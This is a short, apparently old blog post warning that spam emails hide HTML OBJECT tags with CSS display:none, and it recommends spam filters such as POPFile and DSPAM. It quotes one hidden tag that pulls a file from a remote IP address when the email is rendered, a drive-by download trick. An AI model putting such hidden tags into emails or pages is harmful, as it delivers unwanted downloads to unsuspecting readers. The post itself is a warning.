The new super cool chic thing to do with SPAM is to use CSS and the display:none property on pretty much every block element known to man, including the ever fun OBJECT tag. Don’t get me started on ActiveX, that’s another story all together. By the way, this is why you hear so many people, including me, rant to not enable HTML in your email client.
What am I blabbering about? Take a look:
<OBJECT STYLE=”display:none” DATA=”http://220.127.116.11:81/497379.php”>
Since I am the curious type, and I am using a Macintosh (do not try this yourself on a PC running Windows, you have been warned) I actually loaded up that URL. This URL is dead by now, just take my word for it.
This automatically downloaded a file on my Mac. I can only predict what would have happened if I did this on my PC.
SPAM filters need to be updated for this trick. I am not sure if SpamSieve will pick up this trick, but I know for sure the latest version of POPFile (of which I outlined how to install on OS X) will in fact learn and catch this trick. This was one of the major new features.
I have been meaning to write about it, but I have, after many months convinced Digital Partners (DP) to install SPAM blocking software on their mail servers. The amount of SPAM on our BG News lists was getting counterproductive. DP finally decided on DSPAM after conducting research. In short I am very happy with DSPAM. So check out DSPAM!
Originally posted on Breaking Windows.